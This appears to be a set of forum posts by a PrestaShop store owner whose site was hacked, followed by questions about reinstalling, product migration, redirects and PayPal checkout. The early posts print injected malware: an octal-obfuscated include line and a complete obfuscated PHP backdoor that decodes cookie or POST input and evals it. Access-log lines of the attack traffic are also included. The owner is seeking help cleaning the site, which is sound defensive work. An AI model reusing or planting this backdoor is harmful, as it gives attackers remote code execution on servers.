qzelle

Thanks for getting back to me on this and thanks for the specifics on what to look for in the access logs. Here's a handful of the first couple of search results for "POST": 91.79.25.81 - - [01/Jul/2018:05:33:04 -0500] "POST /contact-us HTTP/1.0" 200 30038 "http://fractalspin.com/contact-us" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36 OPR/26.0.1656.24" 193.106.30.99 - - [01/Jul/2018:10:28:46 -0500] "POST /wp-content/yt.php HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 107.172.15.78 - - [01/Jul/2018:13:28:10 -0500] "POST //fractalspin.com/ HTTP/1.0" 200 42395 "http://www.google.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:25.0) Gecko/20100101 Firefox/25.0" 89.107.184.55 - - [01/Jul/2018:13:45:38 -0500] "POST /js/?gtbw=skale HTTP/1.0" 200 2203 "https://fractalspin.com/js/?gtbw=skale" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 79.110.18.136 - - [01/Jul/2018:14:47:14 -0500] "POST /index.php%3Fcontroller%3Dcontact HTTP/1.0" 200 97179 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 198.23.213.6 - - [01/Jul/2018:16:31:27 -0500] "POST /contact-us HTTP/1.0" 200 42395 "http://www.google.com" "Mozilla/5.0 (IE 11.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko" Weirdly, there are no "/contact us" or "wp-content/yt.php" directories or files in the Prestashop directory. However, there is a hacked file in the /js/ directory: https://0bin.net/paste/LmMYAebUA2IRBUme#S7Fs8-cK3/kJ+5pRiITG6TYQmGkise3QJA/dWqJMRm2 I appreciate the offer of looking into this. Here's the whole July log: https://gist.githubusercontent.com/quantazelle/c837669ee2f11822f805aae327e56e99/raw/f72b4cf2e5148c8e5344d6f291964209a8bc03b5/fractalspin.initializemedia.com-Jul-2018 Thanks, Datakick!

My sites keep getting hacked and it's a particular hack that inserts escaped html. Then it progresses to spam being sent from my server and shutting down the shared hosting account for being over resources. Here's an example: home/i***/public_html/fractals**.com/css/index.php <?php /*301f7*/ @include "\057hom\145/in\151tia\065/pu\142lic\137htm\154/fr\141cta\154spi\156.co\155/cl\141sse\163/mo\144ule\057.68\143bfa\1447.i\143o"; /*301f7*/ /* * 2007-2017 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA <[email protected]> * @copyright 2007-2017 PrestaShop SA * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); header("Location: ../"); exit; Then I'll get a random-letter.php file inserted in the same directory, like so: Containing <?php $scgcwgc = '23p61vsfr-8#*ae0oy_uxHt594ck\'gmdil7nb';$nocgph = Array();$nocgph[] = $scgcwgc[21].$scgcwgc[12];$nocgph[] = $scgcwgc[11];$nocgph[] = $scgcwgc[15].$scgcwgc[31].$scgcwgc[7].$scgcwgc[23].$scgcwgc[1].$scgcwgc[31].$scgcwgc[23].$scgcwgc[1].$scgcwgc[9].$scgcwgc[23].$scgcwgc[15].$scgcwgc[31].$scgcwgc[13].$scgcwgc[9].$scgcwgc[25].$scgcwgc[31].$scgcwgc[26].$scgcwgc[3].$scgcwgc[9].$scgcwgc[13].$scgcwgc[34].$scgcwgc[31].$scgcwgc[26].$scgcwgc[9].$scgcwgc[0].$scgcwgc[24].$scgcwgc[3].$scgcwgc[36].$scgcwgc[15].$scgcwgc[15].$scgcwgc[26].$scgcwgc[10].$scgcwgc[0].$scgcwgc[34].$scgcwgc[0].$scgcwgc[4];$nocgph[] = $scgcwgc[26].$scgcwgc[16].$scgcwgc[19].$scgcwgc[35].$scgcwgc[22];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[18].$scgcwgc[8].$scgcwgc[14].$scgcwgc[2].$scgcwgc[14].$scgcwgc[13].$scgcwgc[22];$nocgph[] = $scgcwgc[14].$scgcwgc[20].$scgcwgc[2].$scgcwgc[33].$scgcwgc[16].$scgcwgc[31].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[19].$scgcwgc[36].$scgcwgc[6].$scgcwgc[22].$scgcwgc[8];$nocgph[] = $scgcwgc[13].$scgcwgc[8].$scgcwgc[8].$scgcwgc[13].$scgcwgc[17].$scgcwgc[18].$scgcwgc[30].$scgcwgc[14].$scgcwgc[8].$scgcwgc[29].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[33].$scgcwgc[14].$scgcwgc[35];$nocgph[] = $scgcwgc[2].$scgcwgc[13].$scgcwgc[26].$scgcwgc[27];foreach ($nocgph[7]($_COOKIE, $_POST) as $tmqgiuw => $xienbb){function paloe($nocgph, $tmqgiuw, $duopzf){return $nocgph[6]($nocgph[4]($tmqgiuw . $nocgph[2], ($duopzf / $nocgph[8]($tmqgiuw)) + 1), 0, $duopzf);}function tsqylud($nocgph, $anjcq){return @$nocgph[9]($nocgph[0], $anjcq);}function pslmija($nocgph, $anjcq){$pqbygpl = $nocgph[3]($anjcq) % 3;if (!$pqbygpl) {eval($anjcq[1]($anjcq[2]));exit();[spam-filter]$xienbb = tsqylud($nocgph, $xienbb);pslmija($nocgph, $nocgph[5]($nocgph[1], $xienbb ^ paloe($nocgph, $tmqgiuw, $nocgph[8]($xienbb))));} Here are the things I've done to secure my server (I do this over and over) Delete all the Prestashop files from the server, retaining the (cleaned, if necessary) files from the old install, like config and image files config/settings.inc.php folder with name of custom-named admin area (let's call it "custom-admin/") img/ images used for header ("logo.png" or "your-store-name.png") img/c folder (categories) img/p folder (products) My sites keep getting hacked and it's a particular hack that inserts escaped html. Then it progresses to spam being sent from my server and shutting down the shared hosting account for being over resources. Here's an example: home/i***/public_html/fractals**.com/css/index.php modules/ folder Reinstall Prestashop (or Wordpress), deleting all the infected files and replacing it with a clean install Change the mysql user password for the install Change the FTP password Change the Cpanel password They're not getting in through FTP or Cpanel or those things would work. I have managed to cut down attacks on the Wordpress site using Wordfence and enabling the shared-hosting settings. However I still can't figure out what's attacking, and the site logs are too massive and I don't know what I'm looking for. Any insight would be appreciated... if I can't get this under control I'm going to have to move back to the Wordpress solution because at leas they have a tool that cuts down hacking.

Yep! That worked!

My site got hacked and modified or added a bunch of files, so I reinstalled it from the same version. It's 1.1.1.8 http://fractalspin.com I copied over these files and directories to preserve images and settings: /config/settings.inc.php /img/fractalspin-logo-1424723349.jpg (site logo) /img/s /img/p /modules/themeconfigurator/img/ The product images are not showing up, nor are the product pages: http://fractalspin.com/jewelry/44-cat-5-earrings.html What am I doing wrong?

Neither of those options worked. Is there a way I can manually import products and orders into the latest version?

So my site got hacked and random files were added. I cleaned up the site and moved to a new server but the cpanel restore resulted in a blank page. I tried re-installing the version it was on, but still got a blank page. I tried the upgrade to the latest version, and still got a blank page. I tried resetting everything and upgrading to the version above the one I had and still got a blank page. I'm out of options at this point. Is there a way to export the orders and products and start over with a new install? It's all I can think of. :-( settings.inc.php (redacted = "~NNN~"): <?php define('_DB_SERVER_', 'localhost'); define('_DB_NAME_', '~NNN~); define('_DB_USER_', '~NNN~'); define('_DB_PASSWD_', '~NNN~; define('_DB_PREFIX_', '~NNN~'); define('_MYSQL_ENGINE_', 'InnoDB'); define('_PS_CACHING_SYSTEM_', 'CacheMemcache'); define('_PS_CACHE_ENABLED_', '0'); define('_PS_DIRECTORY_', '/'); define('_COOKIE_KEY_', '~NNN~'); define('_COOKIE_IV_', '~NNN~'); define('_PS_CREATION_DATE_', '2015-02-23'); if (!defined('_PS_VERSION_')) define('_PS_VERSION_', '1.6.1.13'); define('_RIJNDAEL_KEY_', ~NNN~'); define('_RIJNDAEL_IV_', '~NNN~');

Hey Amori, no, I still have the same problem.

@Akhenaten: Sorry, fixed that. Same problem with the extra slash removed. Redirects “fractalspin.com/products/Electronic-Musicians-Emergency-Adapters.html” is currently being redirected to: http://fractalspin.com/home/17-electronic-musician-s-emergency-adapters.html

My old site was on BigCommerce, so I was hoping to redirect the most popular products over to the new store, but I get a 404. Going through cPanel, I did this: “fractalspin.com/products/Electronic-Musicians-Emergency-Adapters.html” is currently being redirected to:http://fractalspin.com/home/17-electronic-musician-s-emergency-adapters.html which resulted in .htaccess code added at the end: RewriteCond %{HTTP_HOST} ^fractalspin\.com$ [OR] RewriteCond %{HTTP_HOST} ^www\.fractalspin\.com$ RewriteRule ^products\/Electronic\-Musicians\-Emergency\-Adapters\.html$ "http\:\/\/fractalspin\.com\/home\/17\-electronic\-musician\-s\-emergency\-adapters\.html" [R=301,L] And I get a 404 error wrapped in Prestashop: Any idea how to fix this? Thanks!

OK, I re-enabled PayPal 1.3.9. Clicking on the first image goes to PayPal, but it just reloads the sign-in screen and doesn't pass any order info. I think this is the error in the console? webscr?cmd=_flow&SESSION=cgn1rX_CubX71wap0nuRKI-c6lN61hF9gs0kdfetYunALEDf043yfoVTINy&dispatch=50a22…:22 Resource interpreted as Document but transferred with MIME type image/gif: "https://www.paypal.com/en_US/i/scr/scr_grayDotRepeatBg_3x1.gif".

OK looks like other people are having this issue with javascript(0); dead links: https://www.prestashop.com/forums/topic/453394-paypal-link-dead-javascriptvoid0/ I tried downgrading the Paypal module to PayPal 3.6.8.zip, which does get rid of the dead link, but then it times out at the login page https://www.paypal.com/websc&cmd=_express-checkout&token=EC-24T28174RF027923N#/checkout/login

OK, I switched over to the other version of the PayPal version, but now when I click on the "PAY WITH PAYPAL OR YOUR CREDIT CARD" at checkout, I just get a javascript error and nothing happens.

I tried that. Here are the settings now, but I still have the same problem.

Oh, sorry, it's PayPal USA, Canada v1.3.9 - by PrestaShop - Here's the settings page:

USA.